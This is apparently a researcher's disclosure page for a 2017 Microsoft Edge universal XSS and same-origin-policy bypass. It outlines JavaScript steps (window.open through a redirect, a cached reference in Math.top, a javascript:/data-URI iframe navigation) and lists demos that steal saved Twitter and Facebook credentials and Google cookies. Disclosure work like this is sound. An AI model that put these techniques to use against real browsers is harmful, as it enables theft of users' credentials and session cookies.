UXSS/SOP bypass on Microsoft Edge
Open/Data confusion

PROOF OF CONCEPT The first two PoCs assume that the user has a Twitter/Facebook account with Edge password manager enabled (default). The same can be done with Paypal, your favorite bank account, or 90% of the sites in the planet (the ones that use iframes).


  1. Steal Twitter Credentials (nothing is sent to the net)

  2. Steal Facebook Credentials (nothing is sent to the net)

  3. Get Google Cookies

  4. Spoof the Referrer as microsoft.com

Blog: UXSS/SOP bypass - Stealing Credentials Pretty Fast!

Watch the Video - UXSS/SOP bypass on Microsoft Edge

QUICK DESCRIPTION
  1. Open a new window with a server redirect to the target site
  2. w=window.open("redir.php?URL=https://www.twitter.com","WIN1");

  3. Save a self-reference in the new window itself
  4. w.Math.top = w; // Cache in any JS built-in object

  5. Immediately do a window.open(javascript) on the new window
  6. window.open("
      javascript:alert('Click once target starts loading');
      Math.top[0].location='data:text/html,ALMOST_TOP_CONTEXT';
    ","WIN1")
The final step executes a window.open/javascript in the context of the previous page (redir.php), however, when using the cached top (in Math.top) to change the location of the first iframe, Edge thinks the statement is really coming from the top. In other words, it thinks the top page (now twitter) is changing the URL of the iframe in twitter.

We can abuse of this by setting a data-uri, which after a couple of tricks (read the post) it will end up in the top context/domain.
BlogPost: UXSS/SOP bypass - Stealing Credentials Pretty Fast!

Tested on: Microsoft Edge fully patched [2017/05/10]
Questions? Tweet me here: @magicmac2000